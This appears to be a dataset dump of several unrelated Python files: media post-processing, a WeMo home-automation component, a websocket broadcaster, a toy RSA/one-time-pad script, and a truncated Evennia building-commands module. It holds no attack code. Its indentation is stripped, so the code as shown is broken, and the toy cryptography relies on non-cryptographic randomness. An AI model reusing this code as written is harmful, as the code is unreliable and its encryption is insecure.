def get_movie_info(self, data):
''' Gets score, imdbid, and other information to help process
data (dict): url-passed params with any additional info
Uses guid to look up local details.
If that fails, uses downloadid.
If that fails, searches tmdb for imdbid
If everything fails returns empty dict {}
Returns dict of any gathered information
'''
# try to get searchresult imdbid using guid first then downloadid
result = None
if data.get('guid'):
logging.info('Searching local database for guid.')
result = core.sql.get_single_search_result('guid', data['guid'])
if result:
logging.info('Local release info found by guid.')
else:
logging.info('Unable to find local release info by guid.')
if not result: # not found from guid
logging.info('Guid not found.')
if data.get('downloadid'):
logging.info('Searching local database for downloadid.')
result = core.sql.get_single_search_result('downloadid', str(data['downloadid']))
if result:
logging.info('Local release info found by downloadid.')
if result['guid'] != data['guid']:
logging.info('Guid for downloadid does not match local data. Adding guid2 to processing data.')
data['guid2'] = result['guid']
else:
logging.info('Unable to find local release info by downloadid.')
if not result: # not found from guid or downloadid
fname = os.path.basename(data.get('path'))
if fname:
logging.info('Searching local database for release name {}'.format(fname))
result = core.sql.get_single_search_result('title', fname)
if result:
logging.info('Found match for {} in releases.'.format(fname))
else:
logging.info('Unable to find local release info by release name, trying fuzzy search.')
result = core.sql.get_single_search_result('title', re.sub(r'[\[\]\(\)\-.:]', '_', fname), like=True)
if result:
logging.info('Found match for {} in releases.'.format(fname))
else:
logging.info('Unable to find local release info by release name.')
# if we found it, get local movie info
if result:
logging.info('Searching local database by imdbid.')
local = core.sql.get_movie_details('imdbid', result['imdbid'])
if local:
logging.info('Movie data found locally by imdbid.')
data.update(local)
data['guid'] = result['guid']
data['finished_score'] = result['score']
data['resolution'] = result['resolution']
data['downloadid'] = result['downloadid']
else:
logging.info('Unable to find movie in local db.')
# Still no luck? Try to get the info from TMDB
else:
logging.info('Unable to find local data for release. Using only data found from file.')
if data and data.get('original_file'):
mdata = Metadata.from_file(data['original_file'], imdbid=data.get('imdbid'))
mdata.update(data)
if not mdata.get('quality'):
data['quality'] = 'Default'
return mdata
elif data:
return data
else:
return {}
def failed(self, data):
''' Post-process a failed download
data (dict): of gathered data from downloader and localdb/tmdb
In SEARCHRESULTS marks guid as Bad
In MARKEDRESULTS:
Creates or updates entry for guid and optional guid2 with status=Bad
Updates MOVIES status
If Clean Up is enabled will delete path and contents.
If Auto Grab is enabled will grab next best release.
Returns dict of post-processing results
'''
config = core.CONFIG['Postprocessing']
# dict we will json.dump and send back to downloader
result = {}
result['status'] = 'finished'
result['data'] = data
result['tasks'] = {}
# mark guid in both results tables
logging.info('Marking guid as Bad.')
guid_result = {'url': data['guid']}
if data['guid']: # guid can be empty string
if Manage.searchresults(data['guid'], 'Bad'):
guid_result['update_SEARCHRESULTS'] = True
else:
guid_result['update_SEARCHRESULTS'] = False
if Manage.markedresults(data['guid'], 'Bad', imdbid=data['imdbid']):
guid_result['update_MARKEDRESULTS'] = True
else:
guid_result['update_MARKEDRESULTS'] = False
# create result entry for guid
result['tasks']['guid'] = guid_result
# if we have a guid2, do it all again
if 'guid2' in data.keys():
logging.info('Marking guid2 as Bad.')
guid2_result = {'url': data['guid2']}
if Manage.searchresults(data['guid2'], 'Bad'):
guid2_result['update SEARCHRESULTS'] = True
else:
guid2_result['update SEARCHRESULTS'] = False
if Manage.markedresults(data['guid2'], 'Bad', imdbid=data['imdbid'], ):
guid2_result['update_MARKEDRESULTS'] = True
else:
guid2_result['update_MARKEDRESULTS'] = False
# create result entry for guid2
result['tasks']['guid2'] = guid2_result
# set movie status
if data['imdbid']:
logging.info('Setting MOVIE status.')
r = Manage.movie_status(data['imdbid'])
else:
logging.info('Imdbid not supplied or found, unable to update Movie status.')
r = ''
result['tasks']['update_movie_status'] = r
# delete failed files
if config['cleanupfailed']:
result['tasks']['cleanup'] = {'enabled': True, 'path': data['path']}
logging.info('Deleting leftover files from failed download.')
if self.cleanup(data['path']) is True:
result['tasks']['cleanup']['response'] = True
else:
result['tasks']['cleanup']['response'] = False
else:
result['tasks']['cleanup'] = {'enabled': False}
# grab the next best release
if core.CONFIG['Search']['autograb']:
result['tasks']['autograb'] = {'enabled': True}
logging.info('Grabbing the next best release.')
if data.get('imdbid') and data.get('quality'):
best_release = snatcher.get_best_release(data)
if best_release and snatcher.download(best_release):
r = True
else:
r = False
else:
r = False
result['tasks']['autograb']['response'] = r
else:
result['tasks']['autograb'] = {'enabled': False}
# all done!
result['status'] = 'finished'
return result
def complete(self, data):
''' Post-processes a complete, successful download
data (dict): all gathered file information and metadata
data must include the following keys:
path (str): path to downloaded item. Can be file or directory
guid (str): nzb guid or torrent hash
downloadid (str): download id from download client
All params can be empty strings if unknown
In SEARCHRESULTS marks guid as Finished
In MARKEDRESULTS:
Creates or updates entry for guid and optional guid with status=bad
In MOVIES updates finished_score and finished_date
Updates MOVIES status
Checks to see if we found a movie file. If not, ends here.
If Renamer is enabled, renames movie file according to core.CONFIG
If Mover is enabled, moves file to location in core.CONFIG, then...
If Clean Up enabled, deletes path after Mover finishes.
Clean Up will not execute without Mover success.
Returns dict of post-processing results
'''
config = core.CONFIG['Postprocessing']
# dict we will json.dump and send back to downloader
result = {}
result['status'] = 'incomplete'
result['data'] = data
result['data']['finished_date'] = str(datetime.date.today())
result['tasks'] = {}
# mark guid in both results tables
logging.info('Marking guid as Finished.')
data['guid'] = data['guid'].lower()
guid_result = {}
if data['guid'] and data.get('imdbid'):
if Manage.searchresults(data['guid'], 'Finished', movie_info=data):
guid_result['update_SEARCHRESULTS'] = True
else:
guid_result['update_SEARCHRESULTS'] = False
if Manage.markedresults(data['guid'], 'Finished', imdbid=data['imdbid']):
guid_result['update_MARKEDRESULTS'] = True
else:
guid_result['update_MARKEDRESULTS'] = False
# create result entry for guid
result['tasks'][data['guid']] = guid_result
# if we have a guid2, do it all again
if data.get('guid2') and data.get('imdbid'):
logging.info('Marking guid2 as Finished.')
guid2_result = {}
if Manage.searchresults(data['guid2'], 'Finished', movie_info=data):
guid2_result['update_SEARCHRESULTS'] = True
else:
guid2_result['update_SEARCHRESULTS'] = False
if Manage.markedresults(data['guid2'], 'Finished', imdbid=data['imdbid']):
guid2_result['update_MARKEDRESULTS'] = True
else:
guid2_result['update_MARKEDRESULTS'] = False
# create result entry for guid2
result['tasks'][data['guid2']] = guid2_result
# set movie status and add finished date/score
if data.get('imdbid'):
if core.sql.row_exists('MOVIES', imdbid=data['imdbid']):
data['category'] = core.sql.get_movie_details('imdbid', data['imdbid'])['category']
else:
logging.info('{} not found in library, adding now.'.format(data.get('title')))
data['status'] = 'Disabled'
Manage.add_movie(data)
logging.info('Setting MOVIE status.')
r = Manage.movie_status(data['imdbid'])
db_update = {'finished_date': result['data']['finished_date'], 'finished_score': result['data'].get('finished_score')}
core.sql.update_multiple_values('MOVIES', db_update, 'imdbid', data['imdbid'])
else:
logging.info('Imdbid not supplied or found, unable to update Movie status.')
r = ''
result['tasks']['update_movie_status'] = r
data.update(Metadata.convert_to_db(data))
# mover. sets ['finished_file']
if config['moverenabled']:
result['tasks']['mover'] = {'enabled': True}
response = self.mover(data)
if not response:
result['tasks']['mover']['response'] = False
else:
data['finished_file'] = response
result['tasks']['mover']['response'] = True
else:
logging.info('Mover disabled.')
data['finished_file'] = data.get('original_file')
result['tasks']['mover'] = {'enabled': False}
# renamer
if config['renamerenabled']:
result['tasks']['renamer'] = {'enabled': True}
new_file_name = self.renamer(data)
if new_file_name == '':
result['tasks']['renamer']['response'] = False
else:
path = os.path.split(data['finished_file'])[0]
data['finished_file'] = os.path.join(path, new_file_name)
result['tasks']['renamer']['response'] = True
else:
logging.info('Renamer disabled.')
result['tasks']['renamer'] = {'enabled': False}
if data.get('imdbid') and data['imdbid'] is not 'N/A':
core.sql.update('MOVIES', 'finished_file', result['data'].get('finished_file'), 'imdbid', data['imdbid'])
# Delete leftover dir. Skip if file links are enabled or if mover disabled/failed
if config['cleanupenabled']:
result['tasks']['cleanup'] = {'enabled': True}
if config['movermethod'] in ('copy', 'hardlink', 'symboliclink'):
logging.info('File copy or linking enabled -- skipping Cleanup.')
result['tasks']['cleanup']['response'] = None
return result
elif os.path.isfile(data['path']):
logging.info('Download is file, not directory -- skipping Cleanup.')
result['tasks']['cleanup']['response'] = None
return result
# fail if mover disabled or failed
if config['moverenabled'] is False or result['tasks']['mover']['response'] is False:
logging.info('Mover either disabled or failed -- skipping Cleanup.')
result['tasks']['cleanup']['response'] = None
else:
if self.cleanup(data['path']):
r = True
else:
r = False
result['tasks']['cleanup']['response'] = r
else:
result['tasks']['cleanup'] = {'enabled': False}
# all done!
result['status'] = 'finished'
return result
def map_remote(self, path):
''' Alters directory based on remote mappings settings
path (str): path from download client
Replaces the base of the file tree with the 'local' mapping.
Ie, '/home/user/downloads/Watcher' becomes '//server/downloads/Watcher'
'path' can be file or directory, it doesn't matter.
If more than one match is found, defaults to the longest path.
remote: local = '/home/users/downloads/': '//server/downloads/'
'/home/users/downloads/Watcher/': '//server/downloads/Watcher/'
In this case, a supplied remote '/home/users/downloads/Watcher/' will match a
startswith() for both supplied settings. So we will default to the longest path.
Returns str new path
'''
maps = core.CONFIG['Postprocessing']['RemoteMapping']
matches = []
for remote in maps.keys():
if path.startswith(remote):
matches.append(remote)
if not matches:
return path
else:
match = max(matches, key=len)
new_path = path.replace(match, maps[match])
logging.info('Changing remote path from {} to {}'.format(path, new_path))
return new_path
def compile_path(self, string, data, is_file=False):
''' Compiles string to file/path names
string (str): brace-formatted string to substitue values (ie '/movies/{title}/')
data (dict): of values to sub into string
is_file (bool): if path is a file, false if directory
Takes a renamer/mover path and adds values.
ie '{title} {year} {resolution}' -> 'Movie 2017 1080P'
Subs double spaces. Trims trailing spaces. Removes any invalid characters.
Can return blank string ''
Sends string to self.sanitize() to remove illegal characters
Returns str new path
'''
new_string = string
for k, v in data.items():
k = '{' + k + '}'
if k in new_string:
new_string = new_string.replace(k, (v or ''))
while ' ' in new_string:
new_string = new_string.replace(' ', ' ')
if not is_file:
new_string = self.map_remote(new_string).strip()
logging.debug('Created path "{}" from "{}"'.format(new_string, string))
return self.sanitize(new_string, is_file=is_file)
def renamer(self, data):
''' Renames movie file based on renamerstring.
data (dict): movie information.
Renames movie file based on params in core.CONFIG
Returns str new file name (blank string on failure)
'''
logging.info('## Renaming Downloaded Files')
config = core.CONFIG['Postprocessing']
renamer_string = config['renamerstring']
# check to see if we have a valid renamerstring
if re.match(r'{(.*?)}', renamer_string) is None:
logging.info('Invalid renamer string {}'.format(renamer_string))
return ''
# existing absolute path
path = os.path.split(data['finished_file'])[0]
# get the extension
ext = os.path.splitext(data['finished_file'])[1]
# get the new file name
new_name = self.compile_path(renamer_string, data, is_file=True)
if not new_name:
logging.info('New file name would be blank. Cancelling renamer.')
return ''
if core.CONFIG['Postprocessing']['replacespaces']:
new_name = new_name.replace(' ', '.')
new_name = new_name + ext
logging.info('Renaming {} to {}'.format(os.path.basename(data.get('original_file')), new_name))
try:
os.rename(data['finished_file'], os.path.join(path, new_name))
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e: # noqa
logging.error('Renamer failed: Could not rename file.', exc_info=True)
return ''
# return the new name so the mover knows what our file is
return new_name
def recycle(self, recycle_bin, abs_filepath):
''' Sends file to recycle bin dir
recycle_bin (str): absolute path to recycle bin directory
abs_filepath (str): absolute path of file to recycle
Creates recycle_bin dir if neccesary.
Moves file to recycle bin. If a file with the same name already
exists, overwrites existing file.
Returns bool
'''
file_dir, file_name = os.path.split(abs_filepath)
if not os.path.isdir(recycle_bin):
logging.info('Creating recycle bin directory {}'.format(recycle_bin))
try:
os.makedirs(recycle_bin)
except Exception as e:
logging.error('Recycling failed: Could not create Recycle Bin directory {}.'.format(recycle_bin), exc_info=True)
return False
logging.info('Recycling {} to recycle bin {}'.format(abs_filepath, recycle_bin))
try:
if os.path.isfile(os.path.join(recycle_bin, file_name)):
os.remove(os.path.join(recycle_bin, file_name))
shutil.move(abs_filepath, recycle_bin)
return True
except Exception as e: # noqa
logging.error('Recycling failed: Could not move file.', exc_info=True)
return False
def remove_additional_files(self, movie_file):
''' Removes addtional associated files of movie_file
movie_file (str): absolute file path of old movie file
Removes any file in original_file's directory that share the same file name
Does not cause mover failure on error.
Returns bool
'''
logging.info('## Removing additional files for {}'.format(movie_file))
path, file_name = os.path.split(movie_file)
fname = os.path.splitext(file_name)[0]
for i in os.listdir(path):
name = os.path.splitext(i)[0]
no_lang_name = None
# check if filename ends with .<2-char-lang-code>
if re.search(r'\.[a-z]{2}$', name, re.I):
no_lang_name = os.path.splitext(name)[0]
if name == fname or no_lang_name == fname:
logging.info('Removing additional file {}'.format(i))
try:
os.remove(os.path.join(path, i))
except Exception as e: # noqa
logging.warning('Unable to remove {}'.format(i), exc_info=True)
return False
return True
def mover(self, data):
'''Moves movie file to path constructed by moverstring
data (dict): movie information.
Moves file to location specified in core.CONFIG
If target file already exists either:
Delete it prior to copying new file in (since os.rename in windows doesn't overwrite)
OR:
Create Recycle Bin directory (if neccesary) and move the old file there.
Copies and renames additional files
Returns str new file location (blank string on failure)
'''
logging.info('## Moving Downloaded Files')
config = core.CONFIG['Postprocessing']
if config['recyclebinenabled']:
recycle_bin = self.compile_path(config['recyclebindirectory'], data)
category = data.get('category', None)
if category in core.CONFIG['Categories']:
moverpath = core.CONFIG['Categories'][category]['moverpath']
else:
moverpath = config['moverpath']
target_folder = os.path.normpath(self.compile_path(moverpath, data))
target_folder = os.path.join(target_folder, '')
# if the new folder doesn't exist, make it
try:
if not os.path.exists(target_folder):
os.makedirs(target_folder)
except Exception as e:
logging.error('Mover failed: Could not create directory {}.'.format(target_folder), exc_info=True)
return ''
current_file_path = data['original_file']
current_path, file_name = os.path.split(current_file_path)
# If finished_file exists, recycle or remove
if data.get('finished_file'):
old_movie = data['finished_file']
logging.info('Checking if old file {} exists.'.format(old_movie))
if os.path.isfile(old_movie):
if config['recyclebinenabled']:
logging.info('Old movie file found, recycling.')
if not self.recycle(recycle_bin, old_movie):
return ''
else:
logging.info('Deleting old file {}'.format(old_movie))
try:
os.remove(old_movie)
except Exception as e:
logging.error('Mover failed: Could not delete file.', exc_info=True)
return ''
if config['removeadditionalfiles']:
self.remove_additional_files(old_movie)
# Check if the target file name exists in target dir, recycle or remove
if os.path.isfile(os.path.join(target_folder, file_name)):
existing_movie_file = os.path.join(target_folder, file_name)
logging.info('Existing file {} found in {}'.format(file_name, target_folder))
if config['recyclebinenabled']:
if not self.recycle(recycle_bin, existing_movie_file):
return ''
else:
logging.info('Deleting old file {}'.format(existing_movie_file))
try:
os.remove(existing_movie_file)
except Exception as e:
logging.error('Mover failed: Could not delete file.', exc_info=True)
return ''
if config['removeadditionalfiles']:
self.remove_additional_files(existing_movie_file)
# Finally the actual move process
new_file_location = os.path.join(target_folder, os.path.basename(data['original_file']))
if config['movermethod'] == 'hardlink':
logging.info('Creating hardlink from {} to {}.'.format(data['original_file'], new_file_location))
try:
os.link(data['original_file'], new_file_location)
except Exception as e:
logging.error('Mover failed: Unable to create hardlink.', exc_info=True)
return ''
elif config['movermethod'] == 'copy':
logging.info('Copying {} to {}.'.format(data['original_file'], new_file_location))
try:
shutil.copy(data['original_file'], new_file_location)
except Exception as e:
logging.error('Mover failed: Unable to copy movie.', exc_info=True)
return ''
else:
logging.info('Moving {} to {}'.format(current_file_path, new_file_location))
try:
shutil.copyfile(current_file_path, new_file_location)
os.unlink(current_file_path)
except Exception as e:
logging.error('Mover failed: Could not move file.', exc_info=True)
return ''
if config['movermethod'] == 'symboliclink':
if core.PLATFORM == 'windows':
logging.warning('Attempting to create symbolic link on Windows. This will fail without SeCreateSymbolicLinkPrivilege.')
logging.info('Creating symbolic link from {} to {}'.format(new_file_location, data['original_file']))
try:
os.symlink(new_file_location, data['original_file'])
except Exception as e:
logging.error('Mover failed: Unable to create symbolic link.', exc_info=True)
return ''
keep_extensions = [i.strip() for i in config['moveextensions'].split(',') if i != '']
if len(keep_extensions) > 0:
logging.info('Moving additional files with extensions {}.'.format(','.join(keep_extensions)))
compiled_name = self.compile_path(config['renamerstring'], data)
for root, dirs, filenames in os.walk(data['path']):
for name in filenames:
old_abs_path = os.path.join(root, name)
fname, ext = os.path.splitext(name) # ('filename', '.ext')
# check if filename ends with .<2-char-lang-code>
if re.search(r'\.[a-z]{2}$', fname, re.I):
fname, lang = os.path.splitext(fname)
target_ext = lang + ext
else:
target_ext = ext
if config['renamerenabled']:
fname = compiled_name
target_file = '{}{}'.format(os.path.join(target_folder, fname), target_ext)
if ext.replace('.', '') in keep_extensions:
append = 0
while os.path.isfile(target_file):
append += 1
new_filename = '{}({})'.format(fname, str(append))
target_file = '{}{}'.format(os.path.join(target_folder, new_filename), target_ext)
try:
logging.info('Moving {} to {}'.format(old_abs_path, target_file))
shutil.copyfile(old_abs_path, target_file)
except Exception as e: # noqa
logging.error('Moving additional files failed: Could not copy {}.'.format(old_abs_path), exc_info=True)
return new_file_location
def cleanup(self, path):
''' Deletes specified path
path (str): of path to remover
path can be file or dir
Returns bool
'''
# if its a dir
if os.path.isdir(path):
try:
shutil.rmtree(path)
return True
except Exception as e:
logging.error('Could not delete path.', exc_info=True)
return False
elif os.path.isfile(path):
# if its a file
try:
os.remove(path)
return True
except Exception as e: # noqa
logging.error('Could not delete path.', exc_info=True)
return False
else:
# if it is somehow neither
return False
def sanitize(self, string, is_file=False):
''' Sanitize file names and paths
string (str): to sanitize
Removes all illegal characters or replaces them based on
user's config.
Returns str
'''
config = core.CONFIG['Postprocessing']
repl = config['replaceillegal']
if is_file:
string = re.sub(r'[\/"*?<>|:]+', repl, string)
else:
string = re.sub(r'["*?<>|]+', repl, string)
drive, path = os.path.splitdrive(string)
path = path.replace(':', repl)
return ''.join([drive, path])
|
the-stack_0_1583 | """
Support for WeMo device discovery.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/wemo/
"""
import logging
from homeassistant.components.discovery import SERVICE_WEMO
from homeassistant.helpers import discovery
from homeassistant.const import EVENT_HOMEASSISTANT_STOP
REQUIREMENTS = ['pywemo==0.4.3']
DOMAIN = 'wemo'
# Mapping from Wemo model_name to component.
WEMO_MODEL_DISPATCH = {
'Bridge': 'light',
'Insight': 'switch',
'Maker': 'switch',
'Sensor': 'binary_sensor',
'Socket': 'switch',
'LightSwitch': 'switch'
}
SUBSCRIPTION_REGISTRY = None
KNOWN_DEVICES = []
_LOGGER = logging.getLogger(__name__)
# pylint: disable=unused-argument, too-many-function-args
def setup(hass, config):
"""Common setup for WeMo devices."""
import pywemo
global SUBSCRIPTION_REGISTRY
SUBSCRIPTION_REGISTRY = pywemo.SubscriptionRegistry()
SUBSCRIPTION_REGISTRY.start()
def stop_wemo(event):
"""Shutdown Wemo subscriptions and subscription thread on exit."""
_LOGGER.info("Shutting down subscriptions.")
SUBSCRIPTION_REGISTRY.stop()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_wemo)
def discovery_dispatch(service, discovery_info):
"""Dispatcher for WeMo discovery events."""
# name, model, location, mac
_, model_name, _, _, serial = discovery_info
# Only register a device once
if serial in KNOWN_DEVICES:
return
_LOGGER.debug('Discovered unique device %s', serial)
KNOWN_DEVICES.append(serial)
component = WEMO_MODEL_DISPATCH.get(model_name, 'switch')
discovery.load_platform(hass, component, DOMAIN, discovery_info,
config)
discovery.listen(hass, SERVICE_WEMO, discovery_dispatch)
_LOGGER.info("Scanning for WeMo devices.")
devices = [(device.host, device) for device in pywemo.discover_devices()]
# Add static devices from the config file.
devices.extend((address, None)
for address in config.get(DOMAIN, {}).get('static', []))
for address, device in devices:
port = pywemo.ouimeaux_device.probe_wemo(address)
if not port:
_LOGGER.warning('Unable to probe wemo at %s', address)
continue
_LOGGER.info('Adding wemo at %s:%i', address, port)
url = 'http://%s:%i/setup.xml' % (address, port)
if device is None:
device = pywemo.discovery.device_from_description(url, None)
discovery_info = (device.name, device.model_name, url, device.mac,
device.serialnumber)
discovery.discover(hass, SERVICE_WEMO, discovery_info)
return True
|
the-stack_0_1584 | #!/usr/bin/env python
import asyncio
import websockets
import time
import threading
connections=set()
def mandar():
global connections
vPrint=True
while True:
if len(connections)>0:
print(connections)
mensaje=input("Esto es un mensaje : ")
if mensaje!="u":
websockets.broadcast(connections,mensaje)
vPrint=True
elif vPrint:
print("Conexiones: ")
print(connections)
vPrint=False
async def handler(websocket):
global connections
connections.add(websocket)
await websocket.wait_closed()
connections.remove(websocket)
async def main():
threading.Thread (target=mandar).start()
async with websockets.serve(handler, "172.24.50.15", 8765):
await asyncio.Future() # run forever..
if __name__ == "__main__":
asyncio.run(main()) |
the-stack_0_1585 | import random
def int2bin_str(d):
return bin(d)[2:]
def txt2int(s):
result = ''
for c in s:
result += '{:03d}'.format(ord(c))
if result.startswith('0'):
result = '999' + result
return int(result)
def int2txt(d):
s = str(d)
if len(s) % 3 != 0:
print('bad int')
return
result = ''
for i in range(0, len(s), 3):
sub = s[i : i + 3]
if sub == '999': continue
result += chr(int(sub))
return result
def gen_one_time_pad(M2):
result = ''
bits = ['0', '1']
for _ in range(len(M2)):
result += random.choice(bits)
return result
def one_time_pad(x, y):
result = ''
for i in range(len(x)):
if x[i] != y[i]:
result += '1'
else:
result += '0'
return result
def extended_euc(a, b):
if a == 0: return b
if b == 0: return a
r0 = a
r1 = b
s0 = 1
s1 = 0
t0 = 0
t1 = 1
q1 = r0 // r1
r2 = r0 - q1 * r1
s2 = s0 - q1 * s1
t2 = t0 - q1 * t1
while r2 != 0:
r0, r1 = r1, r2
s0, s1 = s1, s2
t0, t1 = t1, t2
q1 = r0 // r1
r2 = r0 - q1 * r1
s2 = s0 - q1 * s1
t2 = t0 - q1 * t1
return (r1, s1, t1)
def discrete_exponentiation(N, b, e):
d = {1: b}
last_e = 1
next_e = 2
while next_e <= e:
d[next_e] = (d[last_e] ** 2) % N
last_e = next_e
next_e *= 2
binary = list(bin(e))
result = 1
curr = 1
while binary[-1] != 'b':
if binary.pop() == '1':
result = (result * d[curr]) % N
curr *= 2
return result
def gen_pub_pri_key(P, Q):
N = P * Q
phi = (P - 1) * (Q - 1)
D = random.randrange(phi)
(one, E, t) = extended_euc(D, phi)
while (one != 1):
D = random.randrange(phi)
(one, E, t) = extended_euc(D, phi)
return (N, D, E)
def pub_key_encr(N, E, M):
(valid, s, t) = extended_euc(M, N)
if not (valid == 1 and M < N):
print('bad message')
return
raised_to_public = discrete_exponentiation(N, M, E)
return raised_to_public
def pri_key_decr(N, D, code):
return discrete_exponentiation(N, code, D)
def closure_PGP(N, E, plaintext):
M_bin = int2bin_str(txt2int(plaintext))
pad_bin = gen_one_time_pad(M_bin)
padded_bin = one_time_pad(M_bin, pad_bin)
padded_dec = int(padded_bin, 2)
pad_dec = int(pad_bin, 2)
pad_encr = pub_key_encr(N, E, pad_dec)
return (padded_dec, pad_encr)
def closure_PGP_decode(N, D, X):
(padded_dec, pad_encr) = X
pad_dec = pri_key_decr(N, D, pad_encr)
pad_bin = int2bin_str(pad_dec)
padded_bin = int2bin_str(padded_dec)
while len(padded_bin) < len(pad_bin):
padded_bin = '0' + padded_bin
while len(pad_bin) < len(padded_bin):
pad_bin = '0' + pad_bin
M_bin = one_time_pad(padded_bin, pad_bin)
M_dec = int(M_bin, 2)
plaintext = int2txt(M_dec)
return plaintext
|
the-stack_0_1586 | """
Building and world design commands
"""
import re
from django.core.paginator import Paginator
from django.conf import settings
from django.db.models import Q, Min, Max
from evennia import InterruptCommand
from evennia.scripts.models import ScriptDB
from evennia.objects.models import ObjectDB
from evennia.locks.lockhandler import LockException
from evennia.commands.cmdhandler import get_and_merge_cmdsets
from evennia.utils import create, utils, search, logger, funcparser
from evennia.utils.dbserialize import deserialize
from evennia.utils.utils import (
inherits_from,
class_from_module,
get_all_typeclasses,
variable_from_module,
dbref, crop,
interactive,
list_to_string,
display_len,
format_grid,
)
from evennia.utils.eveditor import EvEditor
from evennia.utils.evmore import EvMore
from evennia.utils.evtable import EvTable
from evennia.prototypes import spawner, prototypes as protlib, menus as olc_menus
from evennia.utils.ansi import raw as ansi_raw
COMMAND_DEFAULT_CLASS = class_from_module(settings.COMMAND_DEFAULT_CLASS)
_FUNCPARSER = None
_ATTRFUNCPARSER = None
# limit symbol import for API
__all__ = (
"ObjManipCommand",
"CmdSetObjAlias",
"CmdCopy",
"CmdCpAttr",
"CmdMvAttr",
"CmdCreate",
"CmdDesc",
"CmdDestroy",
"CmdDig",
"CmdTunnel",
"CmdLink",
"CmdUnLink",
"CmdSetHome",
"CmdListCmdSets",
"CmdName",
"CmdOpen",
"CmdSetAttribute",
"CmdTypeclass",
"CmdWipe",
"CmdLock",
"CmdExamine",
"CmdFind",
"CmdTeleport",
"CmdScripts",
"CmdObjects",
"CmdTag",
"CmdSpawn",
)
# used by set
from ast import literal_eval as _LITERAL_EVAL
LIST_APPEND_CHAR = "+"
# used by find
CHAR_TYPECLASS = settings.BASE_CHARACTER_TYPECLASS
ROOM_TYPECLASS = settings.BASE_ROOM_TYPECLASS
EXIT_TYPECLASS = settings.BASE_EXIT_TYPECLASS
_DEFAULT_WIDTH = settings.CLIENT_DEFAULT_WIDTH
_PROTOTYPE_PARENTS = None
class ObjManipCommand(COMMAND_DEFAULT_CLASS):
"""
This is a parent class for some of the defining objmanip commands
since they tend to have some more variables to define new objects.
Each object definition can have several components. First is
always a name, followed by an optional alias list and finally an
some optional data, such as a typeclass or a location. A comma ','
separates different objects. Like this:
name1;alias;alias;alias:option, name2;alias;alias ...
Spaces between all components are stripped.
A second situation is attribute manipulation. Such commands
are simpler and offer combinations
objname/attr/attr/attr, objname/attr, ...
"""
# OBS - this is just a parent - it's not intended to actually be
# included in a commandset on its own!
def parse(self):
"""
We need to expand the default parsing to get all
the cases, see the module doc.
"""
# get all the normal parsing done (switches etc)
super().parse()
obj_defs = ([], []) # stores left- and right-hand side of '='
obj_attrs = ([], []) # "
for iside, arglist in enumerate((self.lhslist, self.rhslist)):
# lhslist/rhslist is already split by ',' at this point
for objdef in arglist:
aliases, option, attrs = [], None, []
if ":" in objdef:
objdef, option = [part.strip() for part in objdef.rsplit(":", 1)]
if ";" in objdef:
objdef, aliases = [part.strip() for part in objdef.split(";", 1)]
aliases = [alias.strip() for alias in aliases.split(";") if alias.strip()]
if "/" in objdef:
objdef, attrs = [part.strip() for part in objdef.split("/", 1)]
attrs = [part.strip().lower() for part in attrs.split("/") if part.strip()]
# store data
obj_defs[iside].append({"name": objdef, "option": option, "aliases": aliases})
obj_attrs[iside].append({"name": objdef, "attrs": attrs})
# store for future access
self.lhs_objs = obj_defs[0]
self.rhs_objs = obj_defs[1]
self.lhs_objattr = obj_attrs[0]
self.rhs_objattr = obj_attrs[1]
class CmdSetObjAlias(COMMAND_DEFAULT_CLASS):
"""
adding permanent aliases for object
Usage:
alias <obj> [= [alias[,alias,alias,...]]]
alias <obj> =
alias/category <obj> = [alias[,alias,...]:<category>
Switches:
category - requires ending input with :category, to store the
given aliases with the given category.
Assigns aliases to an object so it can be referenced by more
than one name. Assign empty to remove all aliases from object. If
assigning a category, all aliases given will be using this category.
Observe that this is not the same thing as personal aliases
created with the 'nick' command! Aliases set with alias are
changing the object in question, making those aliases usable
by everyone.
"""
key = "@alias"
aliases = "setobjalias"
switch_options = ("category",)
locks = "cmd:perm(setobjalias) or perm(Builder)"
help_category = "Building"
def func(self):
"""Set the aliases."""
caller = self.caller
if not self.lhs:
string = "Usage: alias <obj> [= [alias[,alias ...]]]"
self.caller.msg(string)
return
objname = self.lhs
# Find the object to receive aliases
obj = caller.search(objname)
if not obj:
return
if self.rhs is None:
# no =, so we just list aliases on object.
aliases = obj.aliases.all(return_key_and_category=True)
if aliases:
caller.msg(
"Aliases for %s: %s"
% (
obj.get_display_name(caller),
", ".join(
"'%s'%s"
% (alias, "" if category is None else "[category:'%s']" % category)
for (alias, category) in aliases
),
)
)
else:
caller.msg("No aliases exist for '%s'." % obj.get_display_name(caller))
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You don't have permission to do that.")
return
if not self.rhs:
# we have given an empty =, so delete aliases
old_aliases = obj.aliases.all()
if old_aliases:
caller.msg(
"Cleared aliases from %s: %s"
% (obj.get_display_name(caller), ", ".join(old_aliases))
)
obj.aliases.clear()
else:
caller.msg("No aliases to clear.")
return
category = None
if "category" in self.switches:
if ":" in self.rhs:
rhs, category = self.rhs.rsplit(":", 1)
category = category.strip()
else:
caller.msg(
"If specifying the /category switch, the category must be given "
"as :category at the end."
)
else:
rhs = self.rhs
# merge the old and new aliases (if any)
old_aliases = obj.aliases.get(category=category, return_list=True)
new_aliases = [alias.strip().lower() for alias in rhs.split(",") if alias.strip()]
# make the aliases only appear once
old_aliases.extend(new_aliases)
aliases = list(set(old_aliases))
# save back to object.
obj.aliases.add(aliases, category=category)
# we need to trigger this here, since this will force
# (default) Exits to rebuild their Exit commands with the new
# aliases
obj.at_cmdset_get(force_init=True)
# report all aliases on the object
caller.msg(
"Alias(es) for '%s' set to '%s'%s."
% (
obj.get_display_name(caller),
str(obj.aliases),
" (category: '%s')" % category if category else "",
)
)
class CmdCopy(ObjManipCommand):
"""
copy an object and its properties
Usage:
copy <original obj> [= <new_name>][;alias;alias..]
[:<new_location>] [,<new_name2> ...]
Create one or more copies of an object. If you don't supply any targets,
one exact copy of the original object will be created with the name *_copy.
"""
key = "@copy"
locks = "cmd:perm(copy) or perm(Builder)"
help_category = "Building"
def func(self):
"""Uses ObjManipCommand.parse()"""
caller = self.caller
args = self.args
if not args:
caller.msg(
"Usage: copy <obj> [=<new_name>[;alias;alias..]]"
"[:<new_location>] [, <new_name2>...]"
)
return
if not self.rhs:
# this has no target =, so an identical new object is created.
from_obj_name = self.args
from_obj = caller.search(from_obj_name)
if not from_obj:
return
to_obj_name = "%s_copy" % from_obj_name
